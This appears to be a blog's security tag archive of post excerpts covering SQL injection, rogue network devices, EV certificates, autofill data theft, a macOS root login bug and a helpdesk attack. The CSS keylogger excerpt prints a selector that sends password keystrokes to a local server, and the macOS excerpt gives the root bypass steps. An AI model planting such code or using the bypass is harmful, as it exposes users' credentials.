Recently the folks from Spatie released a security update for their laravel-query-builder package. Turns out it was vulnerable to SQL Injection. At the core of the vulnerability is the fact that Laravel offers a shorthand for querying only certain fields of JSON data, but that these do not get escaped when converted to a json_extract …
Tag Archives: security
The curious case of the Raspberry Pi in the network closet
Christian Haschek: Last week I got a message from a co-worker notifying me there was a Raspberry Pi connected to our network. I asked my IT colleagues and they were as baffled as I was. I heard of people getting paid to put things like this in places they shouldn’t and for this reason I …
Continue reading “The curious case of the Raspberry Pi in the network closet”
The problem with usernames
In “Let’s talk about usernames” James Bennett – author of django-registration – digs deeper into an at first seemingly simple thing such as usernames and how to keep ‘m safe and unique. And no, you can’t make it by just doing a a simple comparison. You’ll have to think of more than that if you …
CSS Keylogger (and why you shouldn’t worry about it)
Leveraging CSS attribute selectors it – in theory – is possible to write a keylogger in pure CSS. The selector below for example targets all input[type=”password”] elements whose last character is an a: input[type=”password”][value$=”a”] { background-image: url(“http://localhost:3000/a”); } The theory goes that whenever a user presses the a character inside an input[type=”password”], a request to …
Continue reading “CSS Keylogger (and why you shouldn’t worry about it)”
Extended Validation Is Broken
https://stripe.ian.sh/ is an interesting site by Ian Carroll. See it? Take a closer look at the certificate. Yes, that’s one for “Stripe, Inc” … but, that’s not “Stripe, Inc” is it? This site uses an EV certificate for “Stripe, Inc”, that was legitimately issued by Comodo. However, when you hear “Stripe, Inc”, you are probably …
“Username or Password Incorrect” is Bullshit
There’s a security best practice where sign ins aren’t supposed to say “password is incorrect”. Instead they’re supposed to say the “username or password is incorrect”. This “best practice” is bullshit. […] You gain no security, yet your customers lose clarity. At first I raised my eyebrow when reading this, yet it became clear rather …
Continue reading ““Username or Password Incorrect” is Bullshit”
Stealing Usernames, Passwords, and other (Personal) Data via Browsers and NPM Packages
👋 This post also got published on Medium. If you like it, please give it some love a clap over there. Late 2016, Stoyan Stefanov published “Oversharing with the browser’s autofill”. It’s an article on stealing personal data using the browsers their form autofill feature. The attack works by leveraging abusing the fact that autocompletion …
Login with root and no password on any mac running macOS High Sierra
This tweet is currently making rounds on Twitter: You can access it via System Preferences>Users & Groups>Click the lock to make changes. Then use "root" with no password. And try it for several times. Result is unbelievable! — Lemi Orhan Ergin (@lemiorhan) November 28, 2017 And yes, that actually works: enter root as a username, …
Continue reading “Login with root and no password on any mac running macOS High Sierra”
TIP: Enable Two Factor Authentication (2FA) with your NPM account
Since early October it’s possible to enable Two Factor Authentication with your NPM account. 2FA is another layer of defense for your account, preventing third parties from altering your code even if they steal or guess your credentials. This is one of the easiest and most important ways to ensure that only you can access …
Continue reading “TIP: Enable Two Factor Authentication (2FA) with your NPM account”
Ticket Trick: Hacking companies through their helpdesk
Clever way, unearthed by Inti de Ceukelaire, to getting access to private communications channels (such as Slack) by leveraging the create-by-email feature of issue trackers/the helpdesk of a company. First target of Init was Gitlab’s Slack channel: Anyone with a valid @gitlab.com e-mail address can join their Slack team. At the same time, GitLab offers …
Continue reading “Ticket Trick: Hacking companies through their helpdesk”